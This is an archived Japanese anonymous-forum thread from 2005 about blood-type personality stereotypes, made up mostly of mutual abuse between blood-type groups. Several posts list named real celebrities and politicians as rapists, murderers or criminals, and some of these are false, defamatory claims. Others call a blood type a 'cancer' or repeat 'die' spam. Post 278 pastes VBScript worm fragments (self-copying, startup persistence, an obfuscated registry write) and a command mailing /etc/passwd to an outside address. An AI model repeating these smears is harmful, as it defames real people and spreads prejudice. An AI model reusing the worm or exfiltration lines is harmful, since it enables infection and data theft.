269 ::2005/05/06(金) 22:00:57 ID:ezcO6oqD
>>265
狂おしく同意。

270 :マドモアゼル名無しさん:2005/05/06(金) 23:49:56 ID:wUt8R4Jq
>>266
おいおい『うんこぶりぶり』はお前が書いたんだろ?
自作自演をするにしてももう少し、いやもっともっと上手くやれよ。
まあ、お前がA型じゃないことだけがすくいだけどね。

271 :マドモアゼル名無しさん:2005/05/06(金) 23:53:58 ID:BqamT963
もぉーー「うんこ」とかであげないでよぉ・゚・(つД`)・゚・  

272 :マドモアゼル名無しさん:2005/05/06(金) 23:55:55 ID:wUt8R4Jq
>>261ではまともなこと言っているようだが、
>>266で急に流れが変わっている。
ID見たら、同一人物であることがわかるのにね。
ひょっとして、自分で自分の書いたこと叩いてんの?
それにしてもお前の意図がわからん。
関係を表すと・・・、
>>231>>266VS>>261という流れ読めないかなぁ?


273 :マドモアゼル名無しさん:2005/05/07(土) 00:14:05 ID:G50zpGMw
+I2rb8Ft=wUt8R4Jq

274 :マドモアゼル名無しさん:2005/05/07(土) 00:32:28 ID:xiVfgJg5
>>265 
B型だけど同意。
見ず知らずの奴が、ただB型ってだけで
「お前はこういう奴だ」と決め付ける奴。
「違う」と否定しても、「B型は馬鹿だから気付いてないんだよ」
という始末。20年自分自身と付き合ってきた私が知らないことを
なんで会ったこともない赤の他人が私のことを知っていると
偉そうに言う、その神経が理解できない。
ほんと血オタは病気。こんな奴らが現実世界に潜んでると思うと
ゾッとする!!!

275 :マドモアゼル名無しさん:2005/05/07(土) 00:34:00 ID:W9TuLaF3
                 Λ_Λ
                 ( ´Д` ) タテンナッテ  Λ_Λ 
   Λ_Λ         /    ,\      (´Д` ) イッテンダロ
   ( ´Д`) クソスレ     | lAB型 l |     /    ,\ 
  /    \        | .;|;;:。;:,:、| ;|    ..,. | l B型l |
  | lO型 l |     ..,. ., ヽ '゚;_。:_;./ /;-゚;・,。:゚;:.゚|;;|.   | ,|
  | |    | _|。.:_::゜。-.;.:゜;/_ン∩ソ/\;;:;.:.。:  ヽ '゚;。_ / /
  ヽ \_ .。'゚/   `。:、`;゜::;.:、,:゚;: .:..゜:: ゚。:..;: /_ン∩ソ/\ 
   /\_ン∩ソ\    ゚ ;:゚..゜:: ゚。:.:.:゚; ゚ ;:゚..;゚;  /  /`ー'ー'\ \
.  /  /`ー'ー'\ \    ゚ ;:゚..゜:: ;。:.:.::゚。;:;.:ヽ  <     / /
 〈  く     / /    ゚ ;:゚.。゜:;゚;゚.。.:`;:;.:.。 \ \    / /
.  \ L   ./ /     .;.:.;.゜::: ;。: ;:゚.゜:: :  .〉 )  ( .く,
    〉 )  ( .く,     ゚.;゚ヽ(`Д´)ノウワァァン(_,ノ   \.`)
   (_,ノ    .`ー'     ;:ヽ( A型 )ノ:゚.;.:;


276 :マドモアゼル名無しさん:2005/05/07(土) 00:36:13 ID:vUaWlWq1
どうみても非Aが立てたっぽいスレだが

277 :マドモアゼル名無しさん:2005/05/07(土) 00:47:16 ID:zJfS2Slh
あぁ、このAAバカはほっといて。

278 :マドモアゼル名無しさん:2005/05/07(土) 18:03:01 ID:WDVVw1kg
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

279 :マドモアゼル名無しさん:2005/05/07(土) 21:21:20 ID:C4Lhvwh2
A型、偽A型あわせて最低でも二人ずつはいる。
最初のほうからじっくり読めば、
どれか本物で、どれが偽物かはすぐわかるけどね。w

280 :マドモアゼル名無しさん:2005/05/07(土) 22:31:46 ID:ypAV6jP3
↑まず一人目の偽Aハケーン!

281 :マドモアゼル名無しさん:2005/05/08(日) 03:39:29 ID:5AR2iyKl
>>261
リアルでAを好いてるのは、同じAとごく一部のABだけと思われ

282 :マドモアゼル名無しさん:2005/05/08(日) 17:03:57 ID:hLZ/HKEn
>>279偽Aの愚考にことごとく迷惑している普通のA型
>>280典型的な偽A
>>281ちょっと識別しにくい

283 :マドモアゼル名無しさん:2005/05/08(日) 18:35:29 ID:EfUq0QaY
>>282
しつこいぞ。迷惑だからよそでやってよ!シッシッ!!

284 :(`∀´)y-^^^:2005/05/08(日) 18:37:01 ID:DVWxO33g























(`∀´)y-^^^

285 : ◆USAMANXP9Y :2005/05/08(日) 18:37:19 ID:Cump8abO

                 Λ_Λ
                 ( ´Д` ) タテンナッテ  Λ_Λ 
   Λ_Λ         /    ,\      (´Д` ) イッテンダロ
   ( ´Д`) クソスレ     | lAB型 l |     /    ,\ 
  /    \        | .;|;;:。;:,:、| ;|    ..,. | l B型l |
  | lO型 l |     ..,. ., ヽ '゚;_。:_;./ /;-゚;・,。:゚;:.゚|;;|.   | ,|
  | |    | _|。.:_::゜。-.;.:゜;/_ン∩ソ/\;;:;.:.。:  ヽ '゚;。_ / /
  ヽ \_ .。'゚/   `。:、`;゜::;.:、,:゚;: .:..゜:: ゚。:..;: /_ン∩ソ/\ 
   /\_ン∩ソ\    ゚ ;:゚..゜:: ゚。:.:.:゚; ゚ ;:゚..;゚;  /  /`ー'ー'\ \
.  /  /`ー'ー'\ \    ゚ ;:゚..゜:: ;。:.:.::゚。;:;.:ヽ  <     / /
 〈  く     / /    ゚ ;:゚.。゜:;゚;゚.。.:`;:;.:.。 \ \    / /
.  \ L   ./ /     .;.:.;.゜::: ;。: ;:゚.゜:: :  .〉 )  ( .く,
    〉 )  ( .く,     ゚.;゚ヽ(`Д´)ノウワァァン(_,ノ   \.`)
   (_,ノ    .`ー'     ;:ヽ( >>1 )ノ:゚.;.:;


286 :マドモアゼル名無しさん:2005/05/08(日) 19:37:22 ID:vizBAcO8
>>1
が押し付けられた借金の額って何十円?

287 :マドモアゼル名無しさん:2005/05/08(日) 19:53:33 ID:5AR2iyKl
>>286
520万円と書いてあるじゃないか、さすが狡猾A、アウシュビッツは無かったと
言い張るのと同じだな

288 :マドモアゼル名無しさん:2005/05/10(火) 22:15:44 ID:PNigmeSA
Aほどの悪党はいないわな

289 : ◆USAMANXP9Y :2005/05/10(火) 22:18:40 ID:fteNl17J


   ∩___∩
   | ノ      ヽ        (((
  /  ●   ● |       ))
  |    ( _●_)  ミ   ∩∩ (
 彡、   |∪|  /  :=| |===*:::::::   
/ __  ヽノ  \   /⊃)))
(___)       \/  /


290 :マドモアゼル名無しさん:2005/05/12(木) 22:05:44 ID:55kq7P5Y
元来(縄文時代)日本はB型とO型が居住する争いの無い平穏な国家だったが、
中国大陸から渡来してきたA型によって統一(侵略)された。
A型は日本に稲作を伝え弥生時代が始まったが、同時に争いの歴史が幕を開けた。

A型=火種、癌

291 :A型は偉いぞ!:2005/05/13(金) 18:15:46 ID:yYqJYTxp
【A型の特徴】-A型は偉いぞ!
■神経質■堅物
■女々しい■ウジウジしているウジ虫
■小心者■器が小さい■執念深い
■独裁者

【典型的A型有名人】-A型は偉いぞ!
■アドルフ・ヒトラー(ドイツナチスの党首、独裁者の鑑)
■スターリン(ソビエト連邦の指導者、独裁者)
■サダム・フセイン(元イラク共和国大統領、独裁者)
■オサマ・ビン・ラディン(国際テロ組織アルカイダの指導者)
■金正日(北朝鮮最高指導者)
■麻原彰晃(オウム真理教教祖)
■宅間守(小学校乱入大量殺人魔)
■NEVADA(長崎女児童殺害犯の小6女児)
■小泉純一郎(婦女暴行レイプ逮捕歴2回)
■世田谷一家惨殺犯
■桶川女子大生ストーカー殺人犯■藤城康孝(加古川7人連続殺人鬼)■八木茂(埼玉本庄保険金殺人犯)■佐賀女子高生連れ去り警官
■ユ・ヨンチョル(韓国21人惨殺魔)
■田代まさし(盗撮・覗き・覚醒剤)■植草一秀(盗撮ミラーマン)
■渡辺恒雄(ナベツネ、わがまま独裁者嫌われ者)
■元XJAPAN-TOSHI(虐待宗教団体幹部)
■森田剛(レイプ魔)
■石橋貴明
■保坂尚輝(DV)高岡早紀
■小柳ルミ子、大澄賢也
■デヴィ夫人
■飯島愛(元AV女優の性悪女)■加藤鷹(AV界のカリスマ、性欲の権化)
■織田無道(インチキ作業野郎)
■石田純一(不倫は文化)
■さとう珠緒(嫌われ女NO.1)
■あびる優(窃盗犯タレント)

292 :マドモアゼル名無しさん:2005/05/13(金) 19:08:16 ID:lSqkI8EK
来週のサザエさんは
「ワカメ処女喪失」
「カツオ夢精にマジビビる」
「フネの高齢出産」
です。
来週もまた見て下さいねージャンケンッポンッ☆(^Д^)om プギャーッ!!

293 :マドモアゼル名無しさん:2005/05/13(金) 22:39:37 ID:BPOqah6F
↑A型ってホントつまんないよね( ´,_ゝ`)プッ

294 :マドモアゼル名無しさん:2005/05/13(金) 22:42:25 ID:yZPLv+9a
目立ちたがりやなんだね、君

295 :マドモアゼル名無しさん:2005/05/13(金) 22:46:36 ID:pILszqIK
BPOqah6F
コピペ魔か。どうりで

296 :マドモアゼル名無しさん:2005/05/13(金) 23:33:27 ID:kcY4UTqt
O型が存在しなければ社会はギクシャクしますよ。
間違いない。
韓国が適例。

韓国=O型比率世界最少国家

297 :マドモアゼル名無しさん:2005/05/13(金) 23:40:20 ID:kcY4UTqt
O型が存在しなければ社会はギクシャクしますよ。
間違いない。
韓国が適例。

韓国=O型比率世界最少国家

298 :マドモアゼル名無しさん:2005/05/13(金) 23:41:52 ID:F47uS4tZ
その韓国ですらO遺伝子は過半数を超えてるがな

299 :マドモアゼル名無しさん:2005/05/14(土) 02:20:04 ID:ol9Zkidc
>>293
コピペ野郎は大人しくコピペだけやってりゃいいんだよ

300 :マドモアゼル名無しさん:2005/05/14(土) 07:22:25 ID:cWz6tobj
中学の時、椅子の裏に鼻糞付けまくりのブスAがいた
掃除の時、注意したら、今度は鼻糞が出次第、食べる
ようになり、先生に見つかり怒られていた

Aって、やっぱりブタにそっくりだねw
(ブタはA、やはり血は争えないw)



301 :マドモアゼル名無しさん:2005/05/14(土) 09:25:09 ID:Zr/TLWcY
>>300
そういう下品な話ってさぁ。
端から見ると君自身の事語ってるように見えるから
注意した方が良いよw

302 :マドモアゼル名無しさん:2005/05/14(土) 13:28:22 ID:ol9Zkidc
>>300
お前はウンコ食ってたんだから人のこと言えないぞw

303 :マドモアゼル名無しさん:2005/05/15(日) 14:39:56 ID:Y8/6df3s
>>300
でも実際問題、血液型以前に、日本では学歴とか、親の資産とか、身分によって、
過酷な労働を強いられたり、不当な賃金で労働させられたり
することがあるから、そっちの方を何とかしないといけないと思うなあ。
ほかの国と違って、カマイヤだったり、奴隷制だったりと言うのは無いけど。


304 :マドモアゼル名無しさん:2005/05/16(月) 19:36:05 ID:T5pDDyXv
A型はマジで必要。
単純労働者として。
君達は需要がある、いや本当に。

305 :マドモアゼル名無しさん:2005/05/16(月) 20:44:47 ID:NZI83BxJ
ttp://images.f1racing.net/large/42039.jpg

↑A型の性

306 :マドモアゼル名無しさん:2005/05/16(月) 20:51:49 ID:nA+BkzsQ
人生最大の思い出・お騒がせ度(各国共通)

1位・A♂♀ マリファナ吸引の日々 覗き見で110番の日々 万引き発覚の日々
     地底生活最後の日(フセイン) 自作自演火炎瓶騒動の日々(麻原)
            ↓
     逮捕・拘留・起訴とムショ・拘置所の日々(他血の味方一人も無し、総スカンの日々)    





以下、同位

AB♂♀・・・結婚、出産、育児の日々
B♂♀・・・黄金の日々、仏陀との出会い
O♀・・・平凡な務め人、小市民の日々


307 :マドモアゼル名無しさん:2005/05/18(水) 10:26:48 ID:+whesz6i
やはりリアルではAと他血は相性が悪いのか?

週刊新潮よりドロドロ人間関係記事抜粋

@「田中真紀子(AB)」ラジオ初レギュラーで「小泉(A)斬り」怪気炎
A「大嫌い」な山拓(A)を救ってしまった「浜四津敏子(B)」
  ↑
大嫌いでも、自公連立のため、やむを得ず応援し、ストレス鬱積
B再デビュー「森昌子」(A)の意外な「デュエット相手」
  ↑
言わずと知れた森進一(O)との離婚騒動


やはりAにはAしかいないようで……

嫌われ者ですね、A型……


308 :AB型は悪いぞ!:2005/05/19(木) 08:13:17 ID:3XZ+VACG
TVタックルの三宅久之(AB型のハゲ)がAB型の短気さを全国ネットの場で自ら体現。
興奮したゆでダコの口から出てくるのは「支離滅裂で矛盾した幼稚な詭弁」だけ。

それにしても、AB型にはロクな奴がいないwww

【AB型の特徴】-AB型は悪いぞ!
■矛盾した言動
■駄文・無駄口が多い
■中身(内容・実質)が無い
■御託を並べるしか能が無い
■過度な自己正当化や自己弁護に狂奔(己の非を認めない)
■神経質■女々しい■小心者■器が小さい
■横柄■傲慢■不遜
■見栄っ張り
■大人の面を被った子供

【典型的AB型有名人】-AB型は悪いぞ!
■岡崎某(奈良で中学生殺し)
■橋本龍太郎(1億円ヤミ献金)
■中西一膳(公然猥褻議員)
■井上陽水(大麻所持で逮捕)
■島田紳助(言葉に詰まると暴力行使)
■石原慎太郎(口先だけビビリ右翼マン)
■三宅久之(興奮剤を常時自己醸成するゆでダコ、支離滅裂で矛盾した幼稚な詭弁)
■古舘伊知郎(場違いな実況報道)
■田中真紀子(支離滅裂な能無し九官鳥)
■川島なお美(プライド保持に狂奔)
■上島竜兵(浮気魔)
■間寛平・ウド鈴木・黒沢年男(3バカトリオ)
■小錦(デブ)

AB型は何の生産性も無く生きてても仕方ないんだから早く絶滅しろよ( ´,_ゝ`)プッ

309 :AB型は悪いぞ!:2005/05/19(木) 16:19:07 ID:fjSFilXU
TVタックルの三宅久之(AB型のハゲ)がAB型の短気さを全国ネットの場で自ら体現。
興奮したゆでダコの口から出てくるのは「支離滅裂で矛盾した幼稚な詭弁」だけ。

それにしても、AB型にはロクな奴がいないwww

【AB型の特徴】-AB型は悪いぞ!
■矛盾した言動
■駄文・無駄口が多い
■中身(内容・実質)が無い
■御託を並べるしか能が無い
■過度な自己正当化や自己弁護に狂奔(己の非を認めない)
■神経質■女々しい■小心者■器が小さい
■横柄■傲慢■不遜
■見栄っ張り
■大人の面を被った子供

【典型的AB型有名人】-AB型は悪いぞ!
■岡崎某(奈良で中学生殺し)
■橋本龍太郎(1億円ヤミ献金)
■中西一膳(公然猥褻議員)
■井上陽水(大麻所持で逮捕)
■島田紳助(言葉に詰まると暴力行使)
■L'Arc〜en〜Ciel・ken(DV、暴力魔)
■石原慎太郎(口先だけビビリ右翼マン)
■三宅久之(興奮剤を常時自己醸成するゆでダコ、支離滅裂で矛盾した幼稚な詭弁)
■古舘伊知郎(場違いな実況報道)
■田中真紀子(支離滅裂な能無し九官鳥)
■川島なお美(プライド保持に狂奔)
■上島竜兵(浮気魔)■小錦(デブ)
■間寛平・ウド鈴木・黒沢年男(3バカトリオ)

AB型は何の生産性も無く生きてても仕方ないんだから早く絶滅しろよ( ´,_ゝ`)プッ

310 :マドモアゼル名無しさん:2005/05/19(木) 19:20:35 ID:6RuHwKJo
A型コピペ虫、朝から必死だな。つまり、言いたいことはA以外は何型もダメであり、
A型マンセーということだな( ´,_ゝ`)プッ





311 : ◆USAMANXP9Y :2005/05/19(木) 19:23:38 ID:lM1ofphl

                  ,、-ー iiiiiiiiiiiーー-、     =     =
                    |iii|(((リ(リソ_)ノリ::i     ニ= 拳 そ -=
                  'iリ"::: ヽr,r' `i|:j     ニ= 王 れ =ニ
                 |ii≧z、ii|r::;;≦;||ツn_   =- な. で -=
  、、 l | /, ,         r'|゙i'了イ|Lミ""´ifii;ノ:::|.| ヽ ニ ..ら. も ニ
 .ヽ     ´´,      t,,i 'i:  _;;_"  イシヽ:ヽヽ  } ´r :   ヽ`
.ヽ し き 拳 ニ.    /|{/ i ヽ,´''''`  ノ| |.|:::::| |  |  ´/小ヽ`
=  て っ 王  =ニ /:.:.::ヽ、/  、_;;,,,,、r :| |.|:::::| |  /
ニ  く. と な  -= ヽ、:.:::::::ヽ、._、  _,ノ/.:::::| | /|
=  れ.何 ら  -=   ヽ、:::::::::\、__/::.zラ.:| |' :|
ニ  る と   =ニ   | |:::::::::::::::::::::::::::::::::::.|'オ.:Y′ト、
/,  : か   ヽ、    | |::::::::::::::::::::::::::::::::::::_ウ_::|  '゙, .\
 /     ヽ、


312 :マドモアゼル名無しさん:2005/05/19(木) 22:03:11 ID:LOJQrtJf
中西一膳はたしかOってきいたことあるけど・・・。

313 :マドモアゼル名無しさん:2005/05/19(木) 22:14:41 ID:6RuHwKJo
「政界・官庁人事録」(東洋経済社)参照
衆議院議員(代議士)全員の顔写真とプロフィール掲載

中西一膳氏=AB型とある




314 :マドモアゼル名無しさん:2005/05/20(金) 09:29:50 ID:a/w1Wt9O
それ間違いとかも多いよ

315 :マドモアゼル名無しさん:2005/05/20(金) 10:06:07 ID:9VyiA89T
そろそろ北朝鮮の核実験が行われるね
日本で何か起こったらA型のせいだと言ってもいいのかな?

316 :マドモアゼル名無しさん:2005/05/20(金) 12:10:08 ID:PjiY9BtJ
好きにすれば

317 :マドモアゼル名無しさん:2005/05/21(土) 00:11:42 ID:tmVdjykh
や〜い、や〜い、低脳、無職、コピペ虫、クソAw

318 :マドモアゼル名無しさん:2005/05/21(土) 08:02:03 ID:l1EhGkHH
・荒らし、煽り、特定の血液型や星座の中傷等は禁止です。
 これらの犯人を特定の血液型,星座と決めつけるのもやめましょう。板が荒れる元です。
・荒らし、煽りは「完全無視」。sageでもレスを返さない。
 反応する事は荒らしへの加担にしかなりません。無視できないあなたも厨房です。



319 :マドモアゼル名無しさん:2005/05/22(日) 20:17:37 ID:7Y67uUBx
ABはみんなに好かれ、Aはみんなに嫌われる

              これ真実

320 :マドモアゼル名無しさん:2005/05/22(日) 22:46:45 ID:wXX1Ll6P
つまりAOのOの部分が性格の悪さの源と言いたいわけね、なるほど

321 :マドモアゼル名無しさん:2005/05/22(日) 23:51:33 ID:7Y67uUBx
>>320
今やどうでもいいが、書いた時点で思ったことは、A物質ガラクトサミンとβ抗体しか
ないから嫌いというこ〜と

322 :マドモアゼル名無しさん:2005/05/23(月) 01:42:34 ID:qtrKYlrp
>>309

どっかで同じタイプのA叩きやってたな

AにもABにも頭の上がらないOってとこか…


323 :マドモアゼル名無しさん:2005/05/23(月) 01:46:03 ID:Vah+P3Dq
>>322
いや、うちのカミサンはOなんだけど、ABは嫌いじゃないそうだ。

324 :322:2005/05/23(月) 03:17:48 ID:Vah+P3Dq
第一、ABはみんなに好かれるんだろ
俺もAは嫌い

325 :マドモアゼル名無しさん:2005/05/23(月) 16:19:41 ID:QhSo47/U
第一、ABはみんなに好かれるんだろ
ABはみんなに好かれ

みんなって誰?w
クラスのみんな?

326 :マドモアゼル名無しさん:2005/05/26(木) 04:15:24 ID:8wnJj84P
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ
糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ 糞Aくたばれ




327 :マドモアゼル名無しさん:2005/05/26(木) 23:29:10 ID:8wnJj84P
本当は糞A型嫌いは巷に数多い。しかし、糞A型がA型嫌いの言論を圧殺、もしくは暴力で
弾圧したり、恐怖政治を敷くから、他血は仕方なく黙っているだけである。

もし、「Aは顔も声も大嫌い。もう生理的に大嫌いなんだから。まして、ふざけた行動する
から氏んでほしいわ」と逝ったとしよう。
すると、糞Aはたちまち、
@「あんたの血液型の方がチョメチョメじゃない?もっと自分の血液型に劣等感を持つべき
だわ。データでもあんたの血液型は嫌われ者でしょ?」などとほざくか、
A粘着質に批判した人の血液型を調べ、執拗に中傷・暴言を繰り返し、暴力(実際に眼の前に
いれば殴る蹴る)でAへの批判を弾圧し、暴力で黙らせようとする。とにかく、執拗に攻撃し
て恐怖心を与え、Aを叩くとロクな目に合わないと思い込ませる。
BAを敵に回すと日本人全部を敵に回したような論理を展開し、他血を威嚇する。しかし、こ
れはもちろんトリックであり、約6割は他血である。
C会社の糞A上司を貶した場合、干されたり、リストラされる可能性大。

以上のような理由で、腹の中ではどんなに嫌っていても、うかつに大嫌いと言えないだけであ
る。






328 :マドモアゼル名無しさん:2005/05/27(金) 01:50:08 ID:DoxHlP8k
非A>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>糞、ゴミクズ>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>A(即追放)










329 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)